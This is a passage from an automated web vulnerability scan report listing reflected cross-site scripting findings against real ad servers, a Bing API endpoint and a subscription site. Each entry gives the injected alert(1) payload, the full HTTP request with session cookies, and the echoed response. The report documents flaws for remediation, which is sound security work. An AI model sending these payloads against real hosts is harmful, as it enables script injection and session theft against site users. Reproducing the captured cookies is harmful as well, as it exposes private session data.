The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ac00'-alert(1)-'fb3b0cd2a48 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=1091329ac00'-alert(1)-'fb3b0cd2a48&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=60843514997508161? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 670
Date: Sat, 26 Mar 2011 01:37:45 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:37:45 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad6/c/a6/%2a/c;235638519;0-0;0;59396967;3454-728/90;40463950/40481737/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=1091329ac00'-alert(1)-'fb3b0cd2a48&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUSMK2%26s
...[SNIP]...

5.25. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.43

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a78e'-alert(1)-'f8fecf152f0 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b8a78e'-alert(1)-'f8fecf152f0&redirect=;ord=60843514997508161? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 670
Date: Sat, 26 Mar 2011 01:37:53 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:37:53 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad6/c/a6/%2a/c;235638519;0-0;0;59396967;3454-728/90;40463950/40481737/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b8a78e'-alert(1)-'f8fecf152f0&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUSMK2%26selleracctnbr%3D6430098999I%26cc%3DUS%26producttypecd%3DI
...[SNIP]...

5.26. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.43

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f615'-alert(1)-'c0e60859184 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=8f615'-alert(1)-'c0e60859184 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 670
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 01:37:58 GMT
Expires: Sat, 26 Mar 2011 01:37:58 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad6/c/a6/%2a/c;235638519;0-0;0;59396967;3454-728/90;40463950/40481737/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=8f615'-alert(1)-'c0e60859184https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUSMK2%26selleracctnbr%3D6430098999I%26cc%3DUS%26producttypecd%3DIP%26source
...[SNIP]...

5.27. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.43

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da786'-alert(1)-'98c2520a2a5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161da786'-alert(1)-'98c2520a2a5&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=60843514997508161? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 670
Date: Sat, 26 Mar 2011 01:37:41 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:37:41 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad6/c/a6/%2a/c;235638519;0-0;0;59396967;3454-728/90;40463950/40481737/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=60843514997508161da786'-alert(1)-'98c2520a2a5&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D
...[SNIP]...

5.28. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 48579<script>alert(1)</script>8f27a3ba150 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1515622&placementId=1515625&pid=225976848579<script>alert(1)</script>8f27a3ba150&ps=-1&zw=580&zh=90&url=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&v=5&dct=Geraldine%20Ferraro%20Dead%3A%20First%20Female%20Vice%20Presidential%20Candidate%20Dies%20At%2075&metakw=geraldine,ferraro,dead%3A,first,female,vice,presidential,candidate,dies,at,75,politics HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16lsqii1n1a3cr; TData=99999%7C61674%7C60489%7C60740%7C60490%7C56262%7C61576%7C60493%7C50963%7C60491%7C60515%7C50455%7C60514%7C53656%7C56830%7C52615%7C60546%7C56918%7C60500%7C56920%7C56930%7C56555%7C53435%7C51133%7C56917%7C56780%7C56500%7C52611%7C54463%7C56969%7C56835%7C54938%7C56761%7C56768%7C54173%7C53603_Wed%2C%2023%20Mar%202011%2019%3A39%3A43%20GMT

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:55 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2507


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "225976848579<script>alert(1)</script>8f27a3ba150"

   
                                                           </head>
...[SNIP]...

5.29. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 70de1--><script>alert(1)</script>17479fecbed was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1515622&placementId=151562570de1--><script>alert(1)</script>17479fecbed&pid=2259768&ps=-1&zw=580&zh=90&url=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&v=5&dct=Geraldine%20Ferraro%20Dead%3A%20First%20Female%20Vice%20Presidential%20Candidate%20Dies%20At%2075&metakw=geraldine,ferraro,dead%3A,first,female,vice,presidential,candidate,dies,at,75,politics HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16lsqii1n1a3cr; TData=99999%7C61674%7C60489%7C60740%7C60490%7C56262%7C61576%7C60493%7C50963%7C60491%7C60515%7C50455%7C60514%7C53656%7C56830%7C52615%7C60546%7C56918%7C60500%7C56920%7C56930%7C56555%7C53435%7C51133%7C56917%7C56780%7C56500%7C52611%7C54463%7C56969%7C56835%7C54938%7C56761%7C56768%7C54173%7C53603_Wed%2C%2023%20Mar%202011%2019%3A39%3A43%20GMT

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:53 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3400
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "151562570de1--><script>alert(1)</script>17479fecbed" -->
...[SNIP]...

5.30. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 87ebb--><script>alert(1)</script>fd77cc4c5e6 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1515622&placementId=1515625&pid=2259768&ps=-187ebb--><script>alert(1)</script>fd77cc4c5e6&zw=580&zh=90&url=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&v=5&dct=Geraldine%20Ferraro%20Dead%3A%20First%20Female%20Vice%20Presidential%20Candidate%20Dies%20At%2075&metakw=geraldine,ferraro,dead%3A,first,female,vice,presidential,candidate,dies,at,75,politics HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16lsqii1n1a3cr; TData=99999%7C61674%7C60489%7C60740%7C60490%7C56262%7C61576%7C60493%7C50963%7C60491%7C60515%7C50455%7C60514%7C53656%7C56830%7C52615%7C60546%7C56918%7C60500%7C56920%7C56930%7C56555%7C53435%7C51133%7C56917%7C56780%7C56500%7C52611%7C54463%7C56969%7C56835%7C54938%7C56761%7C56768%7C54173%7C53603_Wed%2C%2023%20Mar%202011%2019%3A39%3A43%20GMT

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:59 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3839
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-187ebb--><script>alert(1)</script>fd77cc4c5e6" -->
   
...[SNIP]...

5.31. http://api.bing.com/qsonhs.aspx [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload ca1a8<img%20src%3da%20onerror%3dalert(1)>58aa3f015ee was submitted in the q parameter. This input was echoed as ca1a8<img src=a onerror=alert(1)>58aa3f015ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?FORM=ASAPIW&q=ca1a8<img%20src%3da%20onerror%3dalert(1)>58aa3f015ee HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/maps.default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; _HOP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=O

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 9a3fe25a47d543bab74c1bbffe2e1322
Date: Sat, 26 Mar 2011 01:03:07 GMT
Connection: close

{"AS":{"Query":"ca1a8<img src=a onerror=alert(1)>58aa3f015ee","FullResults":1}}

5.32. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PGTP parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the PGTP request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd650"><script>alert(1)</script>4a55cdcca00 was submitted in the PGTP parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=Scd650"><script>alert(1)</script>4a55cdcca00 HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>Subscr
...[SNIP]...
<input type="hidden" name="PGTP" value="Scd650"><script>alert(1)</script>4a55cdcca00">
...[SNIP]...

5.33. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PUBID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the PUBID request parameter is copied into the HTML document as plain text between tags. The payload f5b59<script>alert(1)</script>e93d24ee706 was submitted in the PUBID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586f5b59<script>alert(1)</script>e93d24ee706&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>Web Ca
...[SNIP]...
<BR>
ERROR: Web Page is corrupted! Wrong PUBID=586F5B59<SCRIPT>ALERT(1)</SCRIPT>E93D24EE706.<BR>
...[SNIP]...

5.34. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [RDRID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the RDRID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87621"><script>alert(1)</script>5029ac893ef was submitted in the RDRID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=87621"><script>alert(1)</script>5029ac893ef&SBTYPE=QN&PGTP=S HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
